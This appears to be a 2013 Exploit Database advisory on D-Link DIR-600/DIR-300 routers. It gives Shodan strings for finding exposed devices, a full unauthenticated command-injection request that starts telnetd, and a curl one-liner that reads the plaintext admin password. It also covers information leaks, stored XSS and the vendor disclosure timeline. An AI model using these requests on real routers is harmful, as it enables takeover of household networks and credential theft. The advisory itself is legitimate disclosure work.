D-Link DIR-600 / DIR-300 (Rev B) – Multiple Vulnerabilities

• Exploit Database
• 18 阅读

• 作者： m-1-k-3
  日期： 2013-02-05
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/24453/

• Device Name: DIR-600 / DIR 300 - HW rev B1
  Vendor: D-Link
  
  ============ Vulnerable Firmware Releases - DIR-300: ============
  
  Firmware Version : 2.12 - 18.01.2012
  Firmware Version : 2.13 - 07.11.2012
  
  ============ Vulnerable Firmware Releases - DIR-600: ============
  
  Firmware-Version : 2.12b02 - 17/01/2012
  Firmware-Version : 2.13b01 - 07/11/2012
  Firmware-Version : 2.14b01 - 22/01/2013
  
  ============ Device Description: ============
  
  D-Link® introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network.
  
  Source (dead): http://www.dlink.com/us/en/support/product/dir-600-wireless-n-150-home-r...
  German website: http://www.dlink.de/cs/Satellite?c=TechSupport_C&childpagename=DLinkEuro...
  
  ============ Shodan Torks ============
  
  Shodan search:
  Server: Linux, HTTP/1.1, DIR-300
  Server: Linux, HTTP/1.1, DIR-600
  
  ============ Vulnerability Overview: ============
  
  * OS Command Injection (unauthenticated) 
  
  => Parameter cmd
  
  The vulnerability is caused by missing access restrictions and missing input validation in the cmd parameter and can be exploited to inject and execute arbitrary shell commands.
  It is possible to start a telnetd to compromise the device.
  
  WARNING: You do not need to be authenticated to the device!
  
  Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injectino.png
  
  starting a telnet server:
  Request:
  POST /command.php HTTP/1.1
  Host: 192.168.178.222
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Proxy-Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  Referer: http://192.168.178.222/
  Content-Length: 15
  Cookie: uid=hfaiGzkB4z
  Pragma: no-cache
  Cache-Control: no-cache
  
  cmd=telnetd;
  
  You do not need to be authenticated to the device for executing the malicious commands. You could prepare the whole request and execute it without any authentication details.
  
  For example you could start the telnetd on other ports and interfaces. So with this you are able to get a full shell *h00ray*
  
  Nmap Scan after starting the telnetd:
  Nmap scan report for 192.168.178.222
  Host is up (0.022s latency).
  Not shown: 995 closed ports
  PORTSTATESERVICE VERSION
  1/tcp filtered tcpmux
  23/tcpopen telnetBusyBox telnetd 1.14.1 <<==!!!
  <snip>
  
  Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injection-telnetd.png
  
  * Information disclosure: 
  
  Nice server banner to detect this type of devices easily:
  Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
  Server: Linux, HTTP/1.1, DIR-600 Ver 2.12
  
  * For changing the current password there is no request to the current password 
  
  With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
  
  * Insecure Cryptographic Storage: 
  
  There is no password hashing implemented and so it is saved in plain text on the system:
  # cat var/passwd
  "admin" "test" "0"
  
  Positive Technologies has released an advisory in 2011 and D-Link has fixed this issue:
  http://en.securitylab.ru/lab/PT-2011-30
  With the current version of the firmware the passwords are stored again in plaintext.
  
  If you combine the plaintext credential vulnerability with the unauthenticated os command injection vulnerability you will get the following one liner to extract the admin password from every vulnerable device:
  
  root@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php
  "admin" "THESECRETPASS" "0"
  root@bt:~#
  
  * Information Disclosure: 
  
  Detailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network.
  
  Request:
  http://Target-IP/DevInfo.txt
  
  or try to access version.txt and have a look at the html source ;)
  
  Response:
  HTTP/1.1 200 OK
  Server: Linux, HTTP/1.1, DIR-600 Ver 2.14
  Date: Fri, 31 Dec 1999 18:04:13 GMT
  Content-Length: 267
  
  Firmware External Version: V2.14
  Firmware Internal Version: d1mg
  Model Name: DIR-600
  Hardware Version: Bx
  WLAN Domain: 826
  Kernel: 2.6.33.2
  Language: en
  Graphcal Authentication: Disable
  LAN MAC: <snip>
  WAN MAC: <snip>
  WLAN MAC: <snip>
  
  These details are available without authentication.
  
  * Local path disclosure 
  
  Every piece of information is interesting for the attacker. With this we will get some more details about the operating system and its paths.
  
  Request:
  http://<IP>/router_info.xml
  
  Response:
  HTTP/1.1 200 OK
  Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
  Date: Sat, 01 Jan 2000 21:22:43 GMT
  Content-Type: text/xml
  Content-Length: 49
  
  EPHP: dophp(load,/htdocs/widget/.xml) ERROR (-1)
  
  * Stored XSS via WLAN Assistent and Version Details 
  
  Injecting scripts into the parameter SSID reveals that this parameter is not properly validated for malicious input.
  
  => Parameter: SSID
  
  The injected code gets executed if you try to access the file version.txt. For this you do not need to be authenticated :)
  http://Target-IP/version.txt
  
  ============ Solution ============
  
  No known solution available.
  
  ============ Credits ============
  
  The vulnerability was discovered by Michael Messner
  Mail: devnull#at#s3cur1ty#dot#de
  Web: http://www.s3cur1ty.de/m1adv2013-003
  Video: http://www.s3cur1ty.de/home-network-horror-days
  
  ============ Time Line: ============
  
  14.12.2012 - discovered vulnerability
  14.12.2012 - contacted dlink with the new vulnerability details via webinterface
  20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D'Link
  21.12.2012 - D'link responded that they will check the findings *h00ray*
  11.01.2013 - requested status update
  25.01.2013 - requested status update
  25.01.2013 - D'Link responded that this is a security problem from the user and/or browser and they will not provide a fix. Quite interesting but ok ...
  25.01.2013 - I gave more details and as much input as possible so they can evaluate the vulnerabilities better
  04.02.2013 - no more responses from D'Link, public release
  
  ===================== Advisory end =====================